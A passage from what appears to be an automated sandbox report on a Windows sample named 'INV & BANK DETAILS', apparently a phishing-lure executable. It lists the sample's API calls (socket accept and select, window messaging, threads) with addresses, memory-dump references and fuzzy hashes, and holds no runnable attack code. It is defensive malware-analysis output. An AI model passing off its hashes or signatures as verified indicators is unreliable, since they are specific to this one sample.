                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$LongWindow
                                • String ID:
                                • API String ID: 312131281-0
                                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                APIs
                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorLastacceptselect
                                • String ID:
                                • API String ID: 385091864-0
                                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                APIs
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                • GetStockObject.GDI32(00000011), ref: 00430258
                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$CreateMessageObjectSendShowStock
                                • String ID:
                                • API String ID: 1358664141-0
                                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                • String ID:
                                • API String ID: 2880819207-0
                                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 00430BA2
                                • ScreenToClient.USER32(?,?), ref: 00430BC1
                                • ScreenToClient.USER32(?,?), ref: 00430BE2
                                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ClientRectScreen$InvalidateWindow
                                • String ID:
                                • API String ID: 357397906-0
                                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                APIs
                                • __wsplitpath.LIBCMT ref: 0043392E
                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                • __wsplitpath.LIBCMT ref: 00433950
                                • __wcsicoll.LIBCMT ref: 00433974
                                • __wcsicoll.LIBCMT ref: 0043398A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                • String ID:
                                • API String ID: 1187119602-0
                                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                • String ID:
                                • API String ID: 1597257046-0
                                • Opcode ID: fe99bc0697cc33711826f116b96e18735b0e4b86babd17bf6afeb386559a81e1
                                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                • Opcode Fuzzy Hash: fe99bc0697cc33711826f116b96e18735b0e4b86babd17bf6afeb386559a81e1
                                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                APIs
                                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                • __malloc_crt.LIBCMT ref: 0041F5B6
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: EnvironmentStrings$Free__malloc_crt
                                • String ID:
                                • API String ID: 237123855-0
                                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: DeleteDestroyObject$IconWindow
                                • String ID:
                                • API String ID: 3349847261-0
                                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                APIs
                                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                • String ID:
                                • API String ID: 2223660684-0
                                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                APIs
                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                • LineTo.GDI32(?,?,?), ref: 00447326
                                • EndPath.GDI32(?), ref: 00447336
                                • StrokePath.GDI32(?), ref: 00447344
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                • String ID:
                                • API String ID: 2783949968-0
                                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                • AttachThreadInput.USER32(00000000), ref: 004364AA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                • String ID:
                                • API String ID: 2710830443-0
                                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                • String ID:
                                • API String ID: 146765662-0
                                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                APIs
                                • GetDesktopWindow.USER32 ref: 00472B63
                                • GetDC.USER32(00000000), ref: 00472B6C
                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                APIs
                                • GetDesktopWindow.USER32 ref: 00472BB2
                                • GetDC.USER32(00000000), ref: 00472BBB
                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                APIs
                                • __getptd_noexit.LIBCMT ref: 00415150
                                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                • __freeptd.LIBCMT ref: 0041516B
                                • ExitThread.KERNEL32 ref: 00415173
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
